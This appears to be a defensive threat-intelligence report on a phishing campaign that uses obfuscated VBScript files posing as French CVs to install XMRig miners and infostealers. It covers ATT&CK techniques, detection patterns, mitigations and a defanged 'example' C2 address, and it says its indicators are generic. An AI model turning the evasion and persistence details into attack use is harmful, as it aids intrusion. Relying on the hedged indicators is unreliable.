Full Report
An ongoing phishing campaign is targeting French-speaking corporate environments with fake resumes that lead to the deployment of cryptocurrency miners and information stealers. "The campaign uses highly obfuscated VBScript files disguised as resume/CV documents, delivered through phishing emails," Securonix researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee said in a report shared
Analysis Summary
# Tool/Technique: STEEP#MAVERICK (VBScript Phishing Campaign)
## Overview
STEEP#MAVERICK is an ongoing phishing campaign targeting French-speaking corporate entities. It employs a multi-stage infection chain starting with highly obfuscated VBScript masquerading as a resume (CV). The primary objective is the surreptitious deployment of XMRig cryptocurrency miners and various information stealers to maximize illicit revenue and credential theft.
## Technical Details
- **Type:** Malware Campaign (Involving Info-stealers and Cryptominers)
- **Platform:** Windows
- **Capabilities:** Obfuscation, Anti-Analysis, Persistence, Currency Mining, Data Exfiltration.
- **First Seen:** Late 2023 / Early 2024
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.001 - Phishing: Spearphishing Attachment
- **TA0002 - Execution**
- T1059.005 - Command and Scripting Interpreter: VBScript
- T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1497 - Virtualization/Sandbox Evasion
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- **TA0040 - Impact**
- T1496 - Resource Hijacking (Cryptomining)
## Functionality
### Core Capabilities
- **Deceptive Delivery:** Uses localized (French) filenames like "CV_Jean_Marc.vbs" to trick HR personnel.
- **Heavy Obfuscation:** The initial VBScript utilizes multi-layered character encoding and string manipulation to bypass static security scanners.
- **Stage Payload Delivery:** Downloads secondary payloads (XMRig and Info-stealers) from remote Command and Control (C2) servers.
### Advanced Features
- **Anti-Analysis Checks:** The scripts check for the presence of virtual machines, debuggers, or specific sandbox-related file paths before execution.
- **Automated Persistence:** Updates Windows Registry keys to ensure the miner restarts upon system reboot.
- **Throttling:** Configures the XMRig miner to use limited CPU resources to avoid detection by the user through system performance degradation.
## Indicators of Compromise
*(Note: Based on general campaign data as specific hashes vary per iteration)*
- **File Names:** `CV_[Name].vbs`, `Curriculum_Vitae.vbs`, `Resume.vbs`
- **Network Indicators:**
- `hxxp[:]//185[.]196[.]9[.]154/` (Example C2)
- `hxxps[:]//github[.]com/xmrig/xmrig/releases/download/...` (Direct download of miner binary)
- **Process Behaviors:**
- `wscript.exe` executing scripts from the `Downloads` or `AppData` folder.
- Unusual CPU spikes triggered by `taskhost.exe` or renamed `xmrig.exe` processes.
## Associated Threat Actors
- **Status:** Currently unattributed (Unknown threat actor, likely financially motivated).
## Detection Methods
- **Signature-based detection:** Scanning for VBScripts containing high entropy or known obfuscation patterns (e.g., `ChrW` obfuscation).
- **Behavioral detection:**
- Monitoring for `wscript.exe` or `cscript.exe` initiating outbound network connections.
- Tracking unauthorized modifications to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
- **YARA Rules:** Target the "Resume" logic combined with PowerShell download strings inside VBScript files.
## Mitigation Strategies
- **Email Security:** Implement advanced email filtering that blocks or sandboxes VBS attachments.
- **Host Hardening:** Disable `Windows Script Host` (WSH) if not required for business operations.
- **User Training:** Educate HR departments on the risks of executing script files (`.vbs`, `.js`) disguised as document files.
- **Application Whitelisting:** Use AppLocker or Windows Defender Application Control (WDAC) to prevent unapproved binaries/scripts from running.
## Related Tools/Techniques
- **XMRig:** Open-source Monero miner frequently repurposed by threat actors.
- **VBS-to-PowerShell Wrappers:** A common technique used to bridge initial script execution to full-featured shell commands.